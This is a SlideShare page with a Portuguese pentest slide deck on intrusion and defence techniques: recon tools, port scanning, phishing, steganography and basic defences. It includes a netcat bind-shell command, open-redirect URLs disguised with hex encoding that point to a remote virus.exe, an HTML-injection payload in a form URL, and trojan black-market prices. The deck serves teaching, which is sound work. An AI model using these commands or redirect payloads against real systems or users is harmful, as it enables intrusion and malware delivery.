PENTESTTécnicas de invasão e defesa            Por AnonFeh         www.phillipewebdesigner.com           www.virtuasolucoe...
Tópicos• Técnicas de         • Técnicas contra  Invasão               Invasão• Definindo um alvo   • Firewall + IDS• Recol...
Técnicas de invasão•   Engenharia social•   Brute Force•   Espionagem•   Segurança por obscuridade
Definindo um alvo•   Onde buscar informações?•   google•   myspace•   orkut•   google groups
Google• Buscas específicas• Utilizando recursos avançados do google  como• as tags Intitle, Inurl, Intext• Podem te trazer...
Engenharia social                 Ferramentas úteis•   google               •   john the ripper•   dig                  • ...
Dig• Uma ferramenta similar ou nslookup  porém mais flexível, pode ser utilizada  para fazer buscas como A,TXT, MX e NS.
dig +qr google.com any•   ;; ANSWER SECTION:          NS ns3.google.com.          ;; ADDITIONAL SECTION:•   google.com. 10...
PortScan
Nmap• é o mais famoso portscan existente hoje.  (www.insecure.org/nmap). É uma ótima  ferramenta, muito utilizado por hack...
Nessus• O Nessus é uma ferramenta de auditoria  muito usada para detectar e corrigir  vulnerabilidades nos PCs da rede loc...
Reports
Metasploit• é um ambiente utilizado para escrever,  testar, e executa códigos de exploit. Foi  desenvolvido para prover pe...
http://127.0.0.1:55555/
msfconsole
telnet www.alvo.com.br80•   Trying 200.189.171.181...•   Connected to www.alvo.com.br.•   Escape character is ^].•   GET /...
Resultado• Server: Microsoft-IIS/5.0• X-Powered-By: ASP.NET• Content-Location:  http://www.alvo.com.br/index.htm• Date: Th...
John The RipperUm programa usado para decifrar senhassuportado nas plataformas UNIX, DOS,WinNT?/Win95. É um programa dispo...
hping3• Mais uma ferramenta capaz de enviar  pacotes TCP, UDP e ICMP personalizados  e receber respostas como consegue em ...
netcat• Programa para consultoria de redes muito  conhecido, isso deve-se ao fato de ele ser  um programa muito versátil, ...
netcat• nc -l -e /bin/bash -p 1033• A porta 1033 será colocada em listenning,  redirecionaremos a saída de dados para  um ...
Sniffer• # nc -vv -z 75.126.176.71 -p 80 22 110 25 21• servidor9.molservidores.com [75.126.176.71]  22 (ssh) : Connection ...
Phishing                O que é phishing?• Phishing é um tipo de fraude projetada  para roubar sua identidade. Em um  phis...
Exemplos de Phishing• Alguns sites famosos que permitem este  tipo de fake:• google• yahoo• terra
Google• http://www.google.com/pagead/iclk?sa=l&ai=  Br3ycNQz5Q-  fXBJGSiQLU0eDSAueHkArnhtWZAu-  FmQWgjlkQAxgFKAg4AEDKEUiFO...
Yahoo• http://br.wrs.yahoo.com/_ylt=A0geum1Mv9R  Gw4EB6FXz6Qt./SIG=129lovkbd/EXP=118843  4124/**%63%6c%65%62%65%65%72%2e%6...
Buscador terra• http://buscador.terra.com.br/Redirector.aspx?  bstat=terrastats01&type=CK&source=buscado  r.terra.com.br&i...
Destino???• Nas 3 URLs anteriores a requisição seria  encaminhada para:clebeer.no-ip.org/virus.exe
Outro Exemplohttp://www.cceinformatica.com.br/faleNew.php?mail=cvv@cce.com.br
Adicionando...&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
Esteganografia• Esteganografia basicamente é uma  técnica de esconder um arquivo dentro de  outro arquivo, podendo ser uma...
jp(hide an seek)• O jphide e o jpseek são programas  utilizados para esconder mensagens em  arquivos JPEG.
origem.jpg
destino.jpg
msg.txt• Olá esta mensagem e secretae somente  pessoas que possuam a senha podem vê-  la senha:  @@(##!(*#$#*(!(@&%$(@)cod...
Utilização• Esconder mensagem:• jphide origem.jpg destino.jpg  mensagem.txt• Descobir mensagem:• jpseek destino.jpg texto-...
Quanto vale?Trojan (Shell) - US$ 350,00 - US$700,00Trojan (Roubo de Senhas) - US$600,00Listagem E-mail (32 milhões) - US$1...
Tecnicas contra invasão        • Firewall       • (NHWK)IDS       • HoneyPots        • Antispam
Firewall• Port Knock, uma solução leve e fácil de  configurar, permite que portas específicas  só sejam abertas no momento...
*IDS• NIDS – Network Intrusion Detection System• HIDS -    Host-based    Intrusion   Detection  System• WIDS – Wireless In...
Honeypot• Útil para vigilância e alerta aos tipos de  ataques mais utilizados porem deve ser  utilizado com cuidado para q...
Antispam• Indispensável para qualquer MX, útil para  evitar emails forjados e de domínios não  confiaveis, pode ser increm...
Conclusão• Com a popularidade do SL a informação  ficou mais acessível o que colaborou para  um maior avanço das técnicas ...
Creditos• Cartilha de Segurança - Códigos  maliciosos (Malware)• http://cartilha.cert.br/malware/• BRConnection - Internet...
Próximos SlideShares
Carregando em…5
×

Pentest Invasão e Defesa - AnonFeh

2.024 visualizações

Publicada em

0 comentários
3 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

Sem downloads
Visualizações
Visualizações totais
2.024
No SlideShare
0
A partir de incorporações
0
Número de incorporações
6
Ações
Compartilhamentos
0
Downloads
163
Comentários
0
Gostaram
3
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Pentest Invasão e Defesa - AnonFeh

  1. 1. PENTESTTécnicas de invasão e defesa Por AnonFeh www.phillipewebdesigner.com www.virtuasolucoes.com
  2. 2. Tópicos• Técnicas de • Técnicas contra Invasão Invasão• Definindo um alvo • Firewall + IDS• Recolhendo • HIDS informações • HoneyPots• Ferramentas úteis • Antispam• Phishing• Esteganografia
  3. 3. Técnicas de invasão• Engenharia social• Brute Force• Espionagem• Segurança por obscuridade
  4. 4. Definindo um alvo• Onde buscar informações?• google• myspace• orkut• google groups
  5. 5. Google• Buscas específicas• Utilizando recursos avançados do google como• as tags Intitle, Inurl, Intext• Podem te trazer resultados muito interessantes.
  6. 6. Engenharia social Ferramentas úteis• google • john the ripper• dig • host• nmap • hping3• nessus • netcat• Metasploit• telnet• sendip
  7. 7. Dig• Uma ferramenta similar ou nslookup porém mais flexível, pode ser utilizada para fazer buscas como A,TXT, MX e NS.
  8. 8. dig +qr google.com any• ;; ANSWER SECTION: NS ns3.google.com. ;; ADDITIONAL SECTION:• google.com. 10186 IN • google.com. 318637 IN • smtp1.google.com. 2986 MX 10 NS ns4.google.com. IN A 72.14.203.25 smtp2.google.com. • ;; AUTHORITY SECTION: • smtp2.google.com. 2986• google.com. 10186 IN • google.com. 318637 IN IN A 64.233.167.25 MX 10 NS ns2.google.com. • smtp3.google.com. 2986 smtp3.google.com. • google.com. 318637 IN IN A 64.233.183.25• google.com. 10186 IN NS ns3.google.com. • smtp4.google.com. 2986 MX 10 • google.com. 318637 IN IN A 72.14.215.25 smtp4.google.com. NS ns4.google.com. • ns1.google.com. 345220• google.com. 10186 IN • google.com. 318637 IN IN A 216.239.32.10 MX 10 NS ns1.google.com. • ns2.google.com. 345220 smtp1.google.com. IN A 216.239.34.10• google.com. 318637 IN • ns3.google.com. 345219 NS ns1.google.com. IN A 216.239.36.10• google.com. 318637 IN • ns4.google.com. 345219 NS ns2.google.com. IN A 216.239.38.10• google.com. 318637 IN
  9. 9. PortScan
  10. 10. Nmap• é o mais famoso portscan existente hoje. (www.insecure.org/nmap). É uma ótima ferramenta, muito utilizado por hackers, para descobrir falhas no sistema, em portas abertas desnecessariamente.
  11. 11. Nessus• O Nessus é uma ferramenta de auditoria muito usada para detectar e corrigir vulnerabilidades nos PCs da rede local porem é muito utilizado por hackers para descobrir a vulnerabilidade de um alvo.
  12. 12. Reports
  13. 13. Metasploit• é um ambiente utilizado para escrever, testar, e executa códigos de exploit. Foi desenvolvido para prover penetração e testes em computadores relacionados a esse assunto, como também pesquisa de vulnerabilidade.• Metasploit• Linha de comando• Interface web
  14. 14. http://127.0.0.1:55555/
  15. 15. msfconsole
  16. 16. telnet www.alvo.com.br80• Trying 200.189.171.181...• Connected to www.alvo.com.br.• Escape character is ^].• GET / HTTP/1.1• Host: www.alvo.com.br
  17. 17. Resultado• Server: Microsoft-IIS/5.0• X-Powered-By: ASP.NET• Content-Location: http://www.alvo.com.br/index.htm• Date: Thu, 01 Nov 2007 13:26:39 GMT• Content-Type: text/html• Accept-Ranges: bytes• Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
  18. 18. John The RipperUm programa usado para decifrar senhassuportado nas plataformas UNIX, DOS,WinNT?/Win95. É um programa disponívelgratuitamente desenvolvido para decifrarsenhas MD5, DES baseado na funçãoCRYPT.
  19. 19. hping3• Mais uma ferramenta capaz de enviar pacotes TCP, UDP e ICMP personalizados e receber respostas como consegue em icmp. Com ele você pode enviar arquivos encapsulados e é util para ataques DoS.
  20. 20. netcat• Programa para consultoria de redes muito conhecido, isso deve-se ao fato de ele ser um programa muito versátil, podendo desde ser um simples telnet, portscan até um sniffer.
  21. 21. netcat• nc -l -e /bin/bash -p 1033• A porta 1033 será colocada em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador.
  22. 22. Sniffer• # nc -vv -z 75.126.176.71 -p 80 22 110 25 21• servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused• servidor9.molservidores.com [75.126.176.71] 110 (pop3) open• servidor9.molservidores.com [75.126.176.71] 25 (smtp) open• servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
  23. 23. Phishing O que é phishing?• Phishing é um tipo de fraude projetada para roubar sua identidade. Em um phishing scam, uma pessoa mal- intencionada tenta obter informações como números de cartões de crédito, senhas, dados de contas ou outras informações pessoais convencendo você a fornecê-las sob pretextos enganosos.
  24. 24. Exemplos de Phishing• Alguns sites famosos que permitem este tipo de fake:• google• yahoo• terra
  25. 25. Google• http://www.google.com/pagead/iclk?sa=l&ai= Br3ycNQz5Q- fXBJGSiQLU0eDSAueHkArnhtWZAu- FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f- P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NL QH0sz4&num=5&adurl=%63%6c%65%62%65 %65%72%2e%6e%6f%2d%69%70%2e%6f%72 %67%2f%76%69%72%75%73%2e%65%78%65
  26. 26. Yahoo• http://br.wrs.yahoo.com/_ylt=A0geum1Mv9R Gw4EB6FXz6Qt./SIG=129lovkbd/EXP=118843 4124/**%63%6c%65%62%65%65%72%2e%6e %6f%2d%69%70%2e%6f%72%67%2f%76%69 %72%75%73%2e%65%78%65
  27. 27. Buscador terra• http://buscador.terra.com.br/Redirector.aspx? bstat=terrastats01&type=CK&source=buscado r.terra.com.br&id=sponsored&partner=google &query=nike&position=1&target=%63%6c%65 %62%65%65%72%2e%6e%6f%2d%69%70%2e %6f%72%67%2f%76%69%72%75%73%2e%65 %78%65
  28. 28. Destino???• Nas 3 URLs anteriores a requisição seria encaminhada para:clebeer.no-ip.org/virus.exe
  29. 29. Outro Exemplohttp://www.cceinformatica.com.br/faleNew.php?mail=cvv@cce.com.br
  30. 30. Adicionando...&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
  31. 31. Esteganografia• Esteganografia basicamente é uma técnica de esconder um arquivo dentro de outro arquivo, podendo ser uma imagem , ou documento do Word até mesmo uma planilha de excel e etc só que de uma forma criptografada.
  32. 32. jp(hide an seek)• O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.
  33. 33. origem.jpg
  34. 34. destino.jpg
  35. 35. msg.txt• Olá esta mensagem e secretae somente pessoas que possuam a senha podem vê- la senha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)22 31
  36. 36. Utilização• Esconder mensagem:• jphide origem.jpg destino.jpg mensagem.txt• Descobir mensagem:• jpseek destino.jpg texto-secreto.txt
  37. 37. Quanto vale?Trojan (Shell) - US$ 350,00 - US$700,00Trojan (Roubo de Senhas) - US$600,00Listagem E-mail (32 milhões) - US$1.500,00Milhões de Usuários do ICQ - US$150,00Proteção Contra Detecção do Trojan -US$20,00Suporte
  38. 38. Tecnicas contra invasão • Firewall • (NHWK)IDS • HoneyPots • Antispam
  39. 39. Firewall• Port Knock, uma solução leve e fácil de configurar, permite que portas específicas só sejam abertas no momento desejado atraves de tentativas de conexão em portas específicas.
  40. 40. *IDS• NIDS – Network Intrusion Detection System• HIDS - Host-based Intrusion Detection System• WIDS – Wireless Intrusion Detection System• KIDS - Kernel Intrusion Detection System
  41. 41. Honeypot• Útil para vigilância e alerta aos tipos de ataques mais utilizados porem deve ser utilizado com cuidado para que o invasor não tenha acesso a rede real.
  42. 42. Antispam• Indispensável para qualquer MX, útil para evitar emails forjados e de domínios não confiaveis, pode ser incrementado com opções de RBL e CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart").
  43. 43. Conclusão• Com a popularidade do SL a informação ficou mais acessível o que colaborou para um maior avanço das técnicas de invasão, em contra partida os sistemas de segurança vem se tornando mais estáveis a casa dia.
  44. 44. Creditos• Cartilha de Segurança - Códigos maliciosos (Malware)• http://cartilha.cert.br/malware/• BRConnection - Internet Controlada• http://www.brc.com.br/ AnonFeh www.virtuasolucoes.com

×